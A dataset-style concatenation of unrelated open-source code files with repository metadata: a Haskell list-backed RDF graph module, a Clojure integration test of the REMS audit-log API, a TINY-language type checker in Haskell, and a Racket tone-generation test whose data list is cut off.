-- It maintains the triples in the order that they are given in, and is
-- especially useful for holding N-Triples, where it is often desirable
-- to preserve the order of the triples when they were originally parsed.
-- Duplicate triples are not filtered. If you might have duplicate triples,
-- use @MGraph@ instead, which is also more efficient. However, the query
-- functions of this graph (select, query) remove duplicates from their
-- result triples (but triplesOf does not) since it is usually cheap
-- to do so.
module Data.RDF.Graph.TList (TList) where
import Prelude
#if MIN_VERSION_base(4,9,0)
#if !MIN_VERSION_base(4,11,0)
import Data.Semigroup
#else
#endif
#else
#endif
import Control.DeepSeq (NFData)
import Data.Binary
import Data.RDF.Namespace
import Data.RDF.Query
import Data.RDF.Types (RDF,Rdf(..),Triple(..),Subject,Predicate,Object,NodeSelector,Triples,BaseUrl)
import Data.List (nub)
import GHC.Generics
|A simple implementation of the ' RDF ' type class that represents
-- the graph internally as a list of triples.
--
Note that this type of RDF is fine for interactive
experimentation and querying of smallish ( < 10,000 triples ) graphs ,
-- but there are better options for larger graphs or graphs that you
-- will do many queries against (e.g., @MGraph@ is faster for queries).
--
-- The time complexity of the functions (where n == num_triples) are:
--
-- * 'empty' : O(1)
--
* ' mkRdf ' : O(n )
--
* ' triplesOf ' : )
--
-- * 'select' : O(n)
--
-- * 'query' : O(n)
data TList deriving (Generic)
instance Binary TList
instance NFData TList
data instance RDF TList = TListC (Triples, Maybe BaseUrl, PrefixMappings)
deriving (Generic,NFData)
instance Rdf TList where
baseUrl = baseUrl'
prefixMappings = prefixMappings'
addPrefixMappings = addPrefixMappings'
empty = empty'
mkRdf = mkRdf'
addTriple = addTriple'
removeTriple = removeTriple'
triplesOf = triplesOf'
uniqTriplesOf = uniqTriplesOf'
select = select'
query = query'
showGraph = showGraph'
showGraph' :: RDF TList -> String
showGraph' gr = concatMap (\t -> show t <> "\n") (expandTriples gr)
prefixMappings' :: RDF TList -> PrefixMappings
prefixMappings' (TListC(_, _, pms)) = pms
addPrefixMappings' :: RDF TList -> PrefixMappings -> Bool -> RDF TList
addPrefixMappings' (TListC(ts, baseURL, pms)) pms' replace =
let merge = if replace then flip (<>) else (<>)
in TListC(ts, baseURL, merge pms pms')
baseUrl' :: RDF TList -> Maybe BaseUrl
baseUrl' (TListC(_, baseURL, _)) = baseURL
empty' :: RDF TList
empty' = TListC(mempty, Nothing, PrefixMappings mempty)
-- We no longer remove duplicates here, as it is very time consuming and is often not
-- necessary (raptor does not seem to remove dupes either). Instead, we remove dupes
-- from the results of the select' and query' functions, since it is cheap to do
-- there in most cases, but not when triplesOf' is called.
mkRdf' :: Triples -> Maybe BaseUrl -> PrefixMappings -> RDF TList
mkRdf' ts baseURL pms = TListC (ts, baseURL, pms)
addTriple' :: RDF TList -> Triple -> RDF TList
addTriple' (TListC (ts, bURL, preMapping)) t = TListC (t:ts,bURL,preMapping)
removeTriple' :: RDF TList -> Triple -> RDF TList
removeTriple' (TListC (ts, bURL, preMapping)) t = TListC (newTs,bURL,preMapping)
where newTs = filter (/= t) ts
triplesOf' :: RDF TList -> Triples
triplesOf' ((TListC(ts, _, _))) = ts
uniqTriplesOf' :: RDF TList -> Triples
uniqTriplesOf' = nub . expandTriples
select' :: RDF TList -> NodeSelector -> NodeSelector -> NodeSelector -> Triples
select' g s p o = nub $ filter (matchSelect s p o) $ triplesOf g
query' :: RDF TList -> Maybe Subject -> Maybe Predicate -> Maybe Object -> Triples
query' g s p o = nub $ filter (matchPattern s p o) $ triplesOf g
matchSelect :: NodeSelector -> NodeSelector -> NodeSelector -> Triple -> Bool
matchSelect s p o (Triple s' p' o') = match s s' && match p p' && match o o'
where match fn n = maybe True ($ n) fn
matchPattern :: Maybe Subject -> Maybe Predicate -> Maybe Object -> Triple -> Bool
matchPattern s p o (Triple s' p' o') = match s s' && match p p' && match o o'
where match n1 n2 = maybe True (==n2) n1
| null | https://raw.githubusercontent.com/robstewart57/rdf4h/22538a916ec35ad1c46f9946ca66efed24d95c75/src/Data/RDF/Graph/TList.hs | haskell | # LANGUAGE DeriveAnyClass #
# LANGUAGE EmptyDataDecls #
|"TriplesGraph" contains a list-backed graph implementation suitable
for smallish graphs or for temporary graphs that will not be queried.
It maintains the triples in the order that they are given in, and is
especially useful for holding N-Triples, where it is often desirable
to preserve the order of the triples when they were originally parsed.
Duplicate triples are not filtered. If you might have duplicate triples,
use @MGraph@ instead, which is also more efficient. However, the query
functions of this graph (select, query) remove duplicates from their
result triples (but triplesOf does not) since it is usually cheap
to do so.
the graph internally as a list of triples.
but there are better options for larger graphs or graphs that you
will do many queries against (e.g., @MGraph@ is faster for queries).
The time complexity of the functions (where n == num_triples) are:
* 'empty' : O(1)
* 'select' : O(n)
* 'query' : O(n)
We no longer remove duplicates here, as it is very time consuming and is often not
necessary (raptor does not seem to remove dupes either). Instead, we remove dupes
from the results of the select' and query' functions, since it is cheap to do
there in most cases, but not when triplesOf' is called. | # LANGUAGE CPP #
# LANGUAGE DataKinds #
# LANGUAGE FlexibleInstances #
# LANGUAGE TypeFamilies #
# LANGUAGE DeriveGeneric #
module Data.RDF.Graph.TList (TList) where
import Prelude
#if MIN_VERSION_base(4,9,0)
#if !MIN_VERSION_base(4,11,0)
import Data.Semigroup
#else
#endif
#else
#endif
import Control.DeepSeq (NFData)
import Data.Binary
import Data.RDF.Namespace
import Data.RDF.Query
import Data.RDF.Types (RDF,Rdf(..),Triple(..),Subject,Predicate,Object,NodeSelector,Triples,BaseUrl)
import Data.List (nub)
import GHC.Generics
|A simple implementation of the ' RDF ' type class that represents
Note that this type of RDF is fine for interactive
experimentation and querying of smallish ( < 10,000 triples ) graphs ,
* ' mkRdf ' : O(n )
* ' triplesOf ' : )
data TList deriving (Generic)
instance Binary TList
instance NFData TList
data instance RDF TList = TListC (Triples, Maybe BaseUrl, PrefixMappings)
deriving (Generic,NFData)
instance Rdf TList where
baseUrl = baseUrl'
prefixMappings = prefixMappings'
addPrefixMappings = addPrefixMappings'
empty = empty'
mkRdf = mkRdf'
addTriple = addTriple'
removeTriple = removeTriple'
triplesOf = triplesOf'
uniqTriplesOf = uniqTriplesOf'
select = select'
query = query'
showGraph = showGraph'
showGraph' :: RDF TList -> String
showGraph' gr = concatMap (\t -> show t <> "\n") (expandTriples gr)
prefixMappings' :: RDF TList -> PrefixMappings
prefixMappings' (TListC(_, _, pms)) = pms
addPrefixMappings' :: RDF TList -> PrefixMappings -> Bool -> RDF TList
addPrefixMappings' (TListC(ts, baseURL, pms)) pms' replace =
let merge = if replace then flip (<>) else (<>)
in TListC(ts, baseURL, merge pms pms')
baseUrl' :: RDF TList -> Maybe BaseUrl
baseUrl' (TListC(_, baseURL, _)) = baseURL
empty' :: RDF TList
empty' = TListC(mempty, Nothing, PrefixMappings mempty)
mkRdf' :: Triples -> Maybe BaseUrl -> PrefixMappings -> RDF TList
mkRdf' ts baseURL pms = TListC (ts, baseURL, pms)
addTriple' :: RDF TList -> Triple -> RDF TList
addTriple' (TListC (ts, bURL, preMapping)) t = TListC (t:ts,bURL,preMapping)
removeTriple' :: RDF TList -> Triple -> RDF TList
removeTriple' (TListC (ts, bURL, preMapping)) t = TListC (newTs,bURL,preMapping)
where newTs = filter (/= t) ts
triplesOf' :: RDF TList -> Triples
triplesOf' ((TListC(ts, _, _))) = ts
uniqTriplesOf' :: RDF TList -> Triples
uniqTriplesOf' = nub . expandTriples
select' :: RDF TList -> NodeSelector -> NodeSelector -> NodeSelector -> Triples
select' g s p o = nub $ filter (matchSelect s p o) $ triplesOf g
query' :: RDF TList -> Maybe Subject -> Maybe Predicate -> Maybe Object -> Triples
query' g s p o = nub $ filter (matchPattern s p o) $ triplesOf g
matchSelect :: NodeSelector -> NodeSelector -> NodeSelector -> Triple -> Bool
matchSelect s p o (Triple s' p' o') = match s s' && match p p' && match o o'
where match fn n = maybe True ($ n) fn
matchPattern :: Maybe Subject -> Maybe Predicate -> Maybe Object -> Triple -> Bool
matchPattern s p o (Triple s' p' o') = match s s' && match p p' && match o o'
where match n1 n2 = maybe True (==n2) n1
|
fb75a43f6ffbd15a1c976fca284f93d0087c2c9c9e772678afef05c5025dea7b | CSCfi/rems | test_audit_log.clj | (ns ^:integration rems.api.test-audit-log
(:require [clj-time.core :as time]
[clojure.test :refer :all]
[rems.api.testing :refer :all]
[rems.db.api-key :as api-key]
[rems.db.test-data-helpers :as test-helpers]
[rems.handler :refer [handler]]
[ring.mock.request :refer :all]))
(use-fixtures :each api-fixture)
(deftest test-audit-log
(api-key/add-api-key! "42" {})
(test-helpers/create-user! {:userid "alice"})
(test-helpers/create-user! {:userid "malice"})
(test-helpers/create-user! {:userid "owner"} :owner)
(test-helpers/create-user! {:userid "reporter"} :reporter)
(let [time-a (atom nil)
app-id (test-helpers/create-application! {:actor "alice"})]
(test-helpers/command! {:type :application.command/submit
:application-id app-id
:actor "alice"})
(testing "populate log"
(testing "> unknown endpoint"
(testing "> no user"
(is (response-is-not-found? (-> (request :get "/api/unknown")
handler))))
(testing "> valid api-key and user"
(is (response-is-not-found? (-> (request :get "/api/unknown")
(authenticate "42" "owner")
handler)))))
(testing "> known endpoint"
(testing "> api key"
(testing "> GET"
(testing "> unauthorized"
(is (response-is-forbidden? (-> (request :get "/api/users/active")
(authenticate "42" "alice")
handler))))
(testing "> authorized"
(is (response-is-ok? (-> (request :get "/api/users/active")
(authenticate "42" "owner")
handler))))
(Thread/sleep 2)
(reset! time-a (time/now))
(testing "> application"
(is (response-is-ok? (-> (request :get (str "/api/applications/" app-id))
(authenticate "42" "alice")
handler)))
(is (response-is-ok? (-> (request :get (str "/api/applications/" app-id "/pdf"))
(authenticate "42" "reporter")
handler)))))
(testing "> POST"
(testing "> status 200, different api key"
(api-key/add-api-key! "43" {})
;; this is actually a {:success false} response since
;; the application doesn't exist, but here we only care
;; about the HTTP status.
(is (response-is-ok? (-> (request :post "/api/applications/submit")
(authenticate "43" "alice")
(json-body {:application-id 99999999999})
handler))))
(testing "> status 400"
(is (response-is-bad-request? (-> (request :post "/api/applications/submit")
(authenticate "42" "alice")
(json-body {:boing "3"})
handler))))
(testing "> status 500"
(with-redefs [rems.service.command/command! (fn [_] (throw (Error. "BOOM")))]
(is (response-is-server-error? (-> (request :post "/api/applications/submit")
(authenticate "42" "alice")
(json-body {:application-id 3})
handler)))))))
(testing "> session"
(let [cookie (login-with-cookies "malice")
csrf (get-csrf-token cookie)]
(testing "> GET"
(is (response-is-ok? (-> (request :get "/api/catalogue")
(header "Cookie" cookie)
(header "x-csrf-token" csrf)
handler))))
(testing "> failed PUT"
(is (response-is-forbidden? (-> (request :put "/api/catalogue-items/archived")
(header "Cookie" cookie)
(header "x-csrf-token" csrf)
(json-body {:id 9999999 :archived true})
handler))))))))
(testing "user can't get log"
(is (response-is-forbidden? (-> (request :get "/api/audit-log")
(authenticate "42" "alice")
handler))))
(testing "reporter can get log"
(is (= [{:userid nil :apikey nil :method "get" :path "/api/unknown" :status "404"}
{:userid "owner" :apikey "42" :method "get" :path "/api/unknown" :status "404"}
{:userid "alice" :apikey "42" :method "get" :path "/api/users/active" :status "403"}
{:userid "owner" :apikey "42" :method "get" :path "/api/users/active" :status "200"}
{:userid "alice" :apikey "42" :method "get" :path (str "/api/applications/" app-id) :status "200"}
{:userid "reporter" :apikey "42" :method "get" :path (str "/api/applications/" app-id "/pdf") :status "200"}
{:userid "alice" :apikey "43" :method "post" :path "/api/applications/submit" :status "200"}
{:userid "alice" :apikey "42" :method "post" :path "/api/applications/submit" :status "400"}
{:userid "alice" :apikey "42" :method "post" :path "/api/applications/submit" :status "500"}
{:userid "malice" :apikey nil :method "get" :path "/api/catalogue" :status "200"}
{:userid "malice" :apikey nil :method "put" :path "/api/catalogue-items/archived" :status "403"}
{:userid "alice" :apikey "42" :method "get" :path "/api/audit-log" :status "403"}]
(mapv #(dissoc % :time)
(-> (request :get "/api/audit-log")
(authenticate "42" "reporter")
handler
read-ok-body)))))
(testing "filtering log by user"
(is (= [{:userid "alice" :apikey "42" :method "get" :path "/api/users/active" :status "403"}
{:userid "alice" :apikey "42" :method "get" :path (str "/api/applications/" app-id) :status "200"}
{:userid "alice" :apikey "43" :method "post" :path "/api/applications/submit" :status "200"}
{:userid "alice" :apikey "42" :method "post" :path "/api/applications/submit" :status "400"}
{:userid "alice" :apikey "42" :method "post" :path "/api/applications/submit" :status "500"}
{:userid "alice" :apikey "42" :method "get" :path "/api/audit-log" :status "403"}]
(mapv #(dissoc % :time)
(-> (request :get "/api/audit-log?userid=alice")
(authenticate "42" "reporter")
handler
read-ok-body)))))
(testing "filtering log by time"
(is (= [{:userid nil :apikey nil :method "get" :path "/api/unknown" :status "404"}
{:userid "owner" :apikey "42" :method "get" :path "/api/unknown" :status "404"}
{:userid "alice" :apikey "42" :method "get" :path "/api/users/active" :status "403"}
{:userid "owner" :apikey "42" :method "get" :path "/api/users/active" :status "200"}]
(mapv #(dissoc % :time)
(-> (request :get (str "/api/audit-log?after=2000-01&before=" @time-a))
(authenticate "42" "reporter")
handler
read-ok-body))))
(is (= []
(-> (request :get "/api/audit-log?after=2100-01")
(authenticate "42" "reporter")
handler
read-ok-body))))
(testing "filtering log by application"
(is (= [{:userid "alice" :apikey "42" :method "get" :path (str "/api/applications/" app-id) :status "200"}
{:userid "reporter" :apikey "42" :method "get" :path (str "/api/applications/" app-id "/pdf") :status "200"}]
(mapv #(dissoc % :time)
(-> (request :get (str "/api/audit-log?application-id=" app-id))
(authenticate "42" "reporter")
handler
read-ok-body))))
(is (= []
(mapv #(dissoc % :time)
(-> (request :get "/api/audit-log?application-id=99999999")
(authenticate "42" "reporter")
handler
read-ok-body)))))))
| null | https://raw.githubusercontent.com/CSCfi/rems/490087c4d58339c908da792111029fbaf817a26f/test/clj/rems/api/test_audit_log.clj | clojure | this is actually a {:success false} response since
the application doesn't exist, but here we only care
about the HTTP status. | (ns ^:integration rems.api.test-audit-log
(:require [clj-time.core :as time]
[clojure.test :refer :all]
[rems.api.testing :refer :all]
[rems.db.api-key :as api-key]
[rems.db.test-data-helpers :as test-helpers]
[rems.handler :refer [handler]]
[ring.mock.request :refer :all]))
(use-fixtures :each api-fixture)
(deftest test-audit-log
(api-key/add-api-key! "42" {})
(test-helpers/create-user! {:userid "alice"})
(test-helpers/create-user! {:userid "malice"})
(test-helpers/create-user! {:userid "owner"} :owner)
(test-helpers/create-user! {:userid "reporter"} :reporter)
(let [time-a (atom nil)
app-id (test-helpers/create-application! {:actor "alice"})]
(test-helpers/command! {:type :application.command/submit
:application-id app-id
:actor "alice"})
(testing "populate log"
(testing "> unknown endpoint"
(testing "> no user"
(is (response-is-not-found? (-> (request :get "/api/unknown")
handler))))
(testing "> valid api-key and user"
(is (response-is-not-found? (-> (request :get "/api/unknown")
(authenticate "42" "owner")
handler)))))
(testing "> known endpoint"
(testing "> api key"
(testing "> GET"
(testing "> unauthorized"
(is (response-is-forbidden? (-> (request :get "/api/users/active")
(authenticate "42" "alice")
handler))))
(testing "> authorized"
(is (response-is-ok? (-> (request :get "/api/users/active")
(authenticate "42" "owner")
handler))))
(Thread/sleep 2)
(reset! time-a (time/now))
(testing "> application"
(is (response-is-ok? (-> (request :get (str "/api/applications/" app-id))
(authenticate "42" "alice")
handler)))
(is (response-is-ok? (-> (request :get (str "/api/applications/" app-id "/pdf"))
(authenticate "42" "reporter")
handler)))))
(testing "> POST"
(testing "> status 200, different api key"
(api-key/add-api-key! "43" {})
(is (response-is-ok? (-> (request :post "/api/applications/submit")
(authenticate "43" "alice")
(json-body {:application-id 99999999999})
handler))))
(testing "> status 400"
(is (response-is-bad-request? (-> (request :post "/api/applications/submit")
(authenticate "42" "alice")
(json-body {:boing "3"})
handler))))
(testing "> status 500"
(with-redefs [rems.service.command/command! (fn [_] (throw (Error. "BOOM")))]
(is (response-is-server-error? (-> (request :post "/api/applications/submit")
(authenticate "42" "alice")
(json-body {:application-id 3})
handler)))))))
(testing "> session"
(let [cookie (login-with-cookies "malice")
csrf (get-csrf-token cookie)]
(testing "> GET"
(is (response-is-ok? (-> (request :get "/api/catalogue")
(header "Cookie" cookie)
(header "x-csrf-token" csrf)
handler))))
(testing "> failed PUT"
(is (response-is-forbidden? (-> (request :put "/api/catalogue-items/archived")
(header "Cookie" cookie)
(header "x-csrf-token" csrf)
(json-body {:id 9999999 :archived true})
handler))))))))
(testing "user can't get log"
(is (response-is-forbidden? (-> (request :get "/api/audit-log")
(authenticate "42" "alice")
handler))))
(testing "reporter can get log"
(is (= [{:userid nil :apikey nil :method "get" :path "/api/unknown" :status "404"}
{:userid "owner" :apikey "42" :method "get" :path "/api/unknown" :status "404"}
{:userid "alice" :apikey "42" :method "get" :path "/api/users/active" :status "403"}
{:userid "owner" :apikey "42" :method "get" :path "/api/users/active" :status "200"}
{:userid "alice" :apikey "42" :method "get" :path (str "/api/applications/" app-id) :status "200"}
{:userid "reporter" :apikey "42" :method "get" :path (str "/api/applications/" app-id "/pdf") :status "200"}
{:userid "alice" :apikey "43" :method "post" :path "/api/applications/submit" :status "200"}
{:userid "alice" :apikey "42" :method "post" :path "/api/applications/submit" :status "400"}
{:userid "alice" :apikey "42" :method "post" :path "/api/applications/submit" :status "500"}
{:userid "malice" :apikey nil :method "get" :path "/api/catalogue" :status "200"}
{:userid "malice" :apikey nil :method "put" :path "/api/catalogue-items/archived" :status "403"}
{:userid "alice" :apikey "42" :method "get" :path "/api/audit-log" :status "403"}]
(mapv #(dissoc % :time)
(-> (request :get "/api/audit-log")
(authenticate "42" "reporter")
handler
read-ok-body)))))
(testing "filtering log by user"
(is (= [{:userid "alice" :apikey "42" :method "get" :path "/api/users/active" :status "403"}
{:userid "alice" :apikey "42" :method "get" :path (str "/api/applications/" app-id) :status "200"}
{:userid "alice" :apikey "43" :method "post" :path "/api/applications/submit" :status "200"}
{:userid "alice" :apikey "42" :method "post" :path "/api/applications/submit" :status "400"}
{:userid "alice" :apikey "42" :method "post" :path "/api/applications/submit" :status "500"}
{:userid "alice" :apikey "42" :method "get" :path "/api/audit-log" :status "403"}]
(mapv #(dissoc % :time)
(-> (request :get "/api/audit-log?userid=alice")
(authenticate "42" "reporter")
handler
read-ok-body)))))
(testing "filtering log by time"
(is (= [{:userid nil :apikey nil :method "get" :path "/api/unknown" :status "404"}
{:userid "owner" :apikey "42" :method "get" :path "/api/unknown" :status "404"}
{:userid "alice" :apikey "42" :method "get" :path "/api/users/active" :status "403"}
{:userid "owner" :apikey "42" :method "get" :path "/api/users/active" :status "200"}]
(mapv #(dissoc % :time)
(-> (request :get (str "/api/audit-log?after=2000-01&before=" @time-a))
(authenticate "42" "reporter")
handler
read-ok-body))))
(is (= []
(-> (request :get "/api/audit-log?after=2100-01")
(authenticate "42" "reporter")
handler
read-ok-body))))
(testing "filtering log by application"
(is (= [{:userid "alice" :apikey "42" :method "get" :path (str "/api/applications/" app-id) :status "200"}
{:userid "reporter" :apikey "42" :method "get" :path (str "/api/applications/" app-id "/pdf") :status "200"}]
(mapv #(dissoc % :time)
(-> (request :get (str "/api/audit-log?application-id=" app-id))
(authenticate "42" "reporter")
handler
read-ok-body))))
(is (= []
(mapv #(dissoc % :time)
(-> (request :get "/api/audit-log?application-id=99999999")
(authenticate "42" "reporter")
handler
read-ok-body)))))))
|
0637d6a69749ad874b4ae8902409f6117e63d001c870231f4c1ce6cd14b48fd1 | kahaani/TINY-in-Haskell | TypeCheck.hs | module TypeCheck (
typeCheck
) where
import Control.Monad.Error
import Scan (Token(..))
import Parse (Stmt(..), Exp(..))
data ExpType = VoidT | IntegerT | BooleanT deriving (Eq)
typeCheck :: [Stmt] -> [Stmt]
typeCheck stmts = case typeCheckStmts stmts of
Right () -> stmts
Left err -> error $ "Type Error: " ++ err
typeCheckStmts :: [Stmt] -> Either String ()
typeCheckStmts = mapM_ typeCheckStmt
typeCheckStmt :: Stmt -> Either String ()
typeCheckStmt (If2K exp stmts) = do
type1 <- typeCheckExp exp
assert (type1 == BooleanT) "if test is not Boolean"
typeCheckStmts stmts
typeCheckStmt (If3K exp stmts1 stmts2) = do
type1 <- typeCheckExp exp
assert (type1 == BooleanT) "if test is not Boolean"
typeCheckStmts stmts1
typeCheckStmts stmts2
typeCheckStmt (RepeatK stmts exp) = do
type1 <- typeCheckExp exp
assert (type1 == BooleanT) "repeat test is not Boolean"
typeCheckStmts stmts
typeCheckStmt (AssignK _ exp) = do
type1 <- typeCheckExp exp
assert (type1 == IntegerT) "assignment of non-integer value"
typeCheckStmt (WriteK exp) = do
type1 <- typeCheckExp exp
assert (type1 == IntegerT) "write of non-integer value"
typeCheckStmt (ReadK _) = do
return ()
typeCheckExp :: Exp -> Either String ExpType
typeCheckExp (ConstK _) = return IntegerT
typeCheckExp (IdK _) = return IntegerT
typeCheckExp (OpK token exp1 exp2) = do
type1 <- typeCheckExp exp1
assert (type1 == IntegerT) "Op applied to non-integer"
type2 <- typeCheckExp exp2
assert (type2 == IntegerT) "Op applied to non-integer"
case token of
Lt -> return BooleanT
Equal -> return BooleanT
Plus -> return IntegerT
Minus -> return IntegerT
Times -> return IntegerT
Over -> return IntegerT
assert :: Bool -> String -> Either String ()
assert True _ = return ()
assert False msg = Left msg
| null | https://raw.githubusercontent.com/kahaani/TINY-in-Haskell/9149c71faa09d33a18b00a08180cefeb6359de77/v2/TypeCheck.hs | haskell | module TypeCheck (
typeCheck
) where
import Control.Monad.Error
import Scan (Token(..))
import Parse (Stmt(..), Exp(..))
data ExpType = VoidT | IntegerT | BooleanT deriving (Eq)
typeCheck :: [Stmt] -> [Stmt]
typeCheck stmts = case typeCheckStmts stmts of
Right () -> stmts
Left err -> error $ "Type Error: " ++ err
typeCheckStmts :: [Stmt] -> Either String ()
typeCheckStmts = mapM_ typeCheckStmt
typeCheckStmt :: Stmt -> Either String ()
typeCheckStmt (If2K exp stmts) = do
type1 <- typeCheckExp exp
assert (type1 == BooleanT) "if test is not Boolean"
typeCheckStmts stmts
typeCheckStmt (If3K exp stmts1 stmts2) = do
type1 <- typeCheckExp exp
assert (type1 == BooleanT) "if test is not Boolean"
typeCheckStmts stmts1
typeCheckStmts stmts2
typeCheckStmt (RepeatK stmts exp) = do
type1 <- typeCheckExp exp
assert (type1 == BooleanT) "repeat test is not Boolean"
typeCheckStmts stmts
typeCheckStmt (AssignK _ exp) = do
type1 <- typeCheckExp exp
assert (type1 == IntegerT) "assignment of non-integer value"
typeCheckStmt (WriteK exp) = do
type1 <- typeCheckExp exp
assert (type1 == IntegerT) "write of non-integer value"
typeCheckStmt (ReadK _) = do
return ()
typeCheckExp :: Exp -> Either String ExpType
typeCheckExp (ConstK _) = return IntegerT
typeCheckExp (IdK _) = return IntegerT
typeCheckExp (OpK token exp1 exp2) = do
type1 <- typeCheckExp exp1
assert (type1 == IntegerT) "Op applied to non-integer"
type2 <- typeCheckExp exp2
assert (type2 == IntegerT) "Op applied to non-integer"
case token of
Lt -> return BooleanT
Equal -> return BooleanT
Plus -> return IntegerT
Minus -> return IntegerT
Times -> return IntegerT
Over -> return IntegerT
assert :: Bool -> String -> Either String ()
assert True _ = return ()
assert False msg = Left msg
| |
e88f1cc6b8a6f8135fee9cb29057a5b110f8f319008014bbb8af42b2d9d27b97 | jbclements/RSound | test-make-tone.rkt | #lang racket
(module+ test
(require "../main.rkt"
"../integral-cycles.rkt"
rackunit
rackunit/text-ui)
(run-tests
(test-suite
"make-tone"
(let ()
;; tests of integral-cycles:
(check-equal? (cycles-to-use 441 44100.0) 1)
(check-equal? (cycles-to-use 440 44100.0) 22)
(check-equal? (cycles-to-use (* 440 (expt 2 1/12)) 44100.0) 103)
;; this is a performance test, to see whether
;; caching and caching of cycles is working correctly.
(define-values (dc t1 t2 t3)
(time-apply
(lambda ()
(map
(lambda (p) (apply make-tone p))
'((130.8127826502993 91/1270 220040)
(130.8127826502993 91/1270 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(146.8323839587038 89/1270 330290)
(146.8323839587038 89/1270 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(164.81377845643496 10/127 330290)
(164.81377845643496 51/635 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 51/635 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(174.61411571650194 44/635 110020)
(174.61411571650194 44/635 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(195.99771799087463 48/635 111168)
(195.99771799087463 48/635 111168)
(195.99771799087463 10/127 109790)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 109790)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 109790)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 109790)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 109790)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 109790)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 109790)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 109790)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 111168)
(207.65234878997256 99/1270 109790)
(207.65234878997256 99/1270 109790)
(207.65234878997256 10/127 109790)
(207.65234878997256 10/127 109790)
(207.65234878997256 10/127 109790)
(207.65234878997256 10/127 109790)
(207.65234878997256 10/127 109790)
(207.65234878997256 10/127 109790)
(207.65234878997256 10/127 109790)
(207.65234878997256 10/127 109790)
(220 91/1270 220040)
(220 91/1270 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(261.6255653005986 91/1270 220040)
(261.6255653005986 99/1270 109790)
(261.6255653005986 91/1270 220040)
(261.6255653005986 99/1270 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(293.6647679174076 89/1270 330290)
(293.6647679174076 89/1270 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
